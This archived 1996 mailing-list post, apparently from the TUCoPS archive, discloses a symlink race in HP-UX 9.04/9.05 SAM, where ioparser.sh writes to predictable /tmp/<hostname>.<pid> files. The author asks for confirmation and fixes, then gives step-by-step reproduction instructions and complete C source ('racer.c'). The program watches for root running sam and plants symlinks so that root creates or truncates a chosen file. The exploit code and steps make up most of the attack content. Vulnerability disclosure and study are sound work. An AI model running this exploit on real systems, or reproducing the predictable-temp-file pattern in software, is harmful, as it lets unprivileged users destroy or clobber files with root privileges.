HP-UX SAM hole...
John W. Jacobi (jjacobi@nova.umuc.edu)
Wed, 25 Sep 1996 08:07:46 -0700
I never saw this distributed to listserv recipients, that
is why I have sent it again. Could you please repost.
Hi all,
Could someone confirm this for me or tell me if I am mistaken ???
Perhaps suggest an easy way to prevent this ???
I have discovered something that any user can exploit to
cause root to create or truncate files on the system when root runs sam.
I have put the source code that I wrote to verify it below.
Version: HP-UX 9.04 & 9.05 on 9000/700 & 9000/800
My basic question is:
"Is there any more global and easy way to prevent this from
happening
aside from modifying the affected scripts ? as I have found that this
exists
in other places then just sam ?" Perhaps something rather generic on
how root
follows sym links ? Maybe I'm just pipe dreaming...
How it worked for me:
What really happens is that sam is a script and it calls another script
named ioparser.sh which writes to temporary file in /tmp of whose name
is
easily guessable. Basically, if you see sam pop up in the process
table,
create a bunch of sym links of the format /tmp/<hostname>.<pid> where
hostname is the hostname and pid is a number beginning at the sam's PID
+ 1
o n up to some value like sam's PID + 50. When the sam script calls the
ioparser.sh, it redirects output to a file like /tmp/<hostname>.$$ (the
shell PID), follows the link, and as root creates or truncates what the
link
points to.
Any suggestions on what to do, however simple they might be would be
greatly
appreciated.
Thanks
How to do it:
Go to your HP 9.04/5 system first.
1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (you
shouldn't need to)
3. Log in on another terminal, become root and insure that sam is not
currently executing.
4. As the normal user log in, run the program that you compiled in step
2.
5. On the root log in session, run sam.
6. Look at the target file.
/* Code to exploit race of sam calling iopasrer.sh
It will usually cause the ioparser.sh script run
by root to follow the sym links created here to
create or truncate TARGET_FILENAME as root.
It ain't pretty and may not always work, but usually
does.
Compile on HP9000/[700/800] 9.04[5] with the command:
cc racer.c -o racer -Ae
*/
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <symlink.h>
#define PROC_TO_LOOK_FOR "sam" /* The process to look
for in ps */
#define TARGET_FILENAME "/check_this" /* File that is created or
trunc'ed */
#define NUM_SYM_LINKS 50 /* Increase this
for systems that fork() alot */
void main(void)
{
char ps_buf[65536]; /* ps data buffer */
char *line; /* a pointer in to the ps_buf */
char f1[80]; /* buffer space for the sym link name */
char hostname[32]; /* buffer space to hold hostname, duh */
int fd; /* fd is for the pipe */
int ext; /* the extantion to place on the
symlink (pid) */
int loop; /* Dumb loop variable,
suggestions ??? */
unlink("ps_fifo"); /* Why
not */
mkfifo("ps_fifo",S_IRUSR|S_IWUSR); /* Need this */
fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
*/
gethostname(hostname,32); /* gets the hostname just like
ioparser.sh !!! */
printf("Looking for process %s, will exploit filename
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
/* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
while(1) {
system("/bin/ps -u 0 > ps_fifo");
read(fd,ps_buf,65536);
if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
while( *line != '\n' ) {
line--;
}
line+=2;
line[5] = '\0';
ext = atoi(line);
for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
{
sprintf(f1,"/tmp/%s.%d",hostname,ext +
loop);
symlink(TARGET_FILENAME,f1);
}
while( (access(TARGET_FILENAME,F_OK)) < 0 );
printf("%s has run, wait a few seconds and check
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
unlink("ps_fifo");
exit();
}
}
}
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
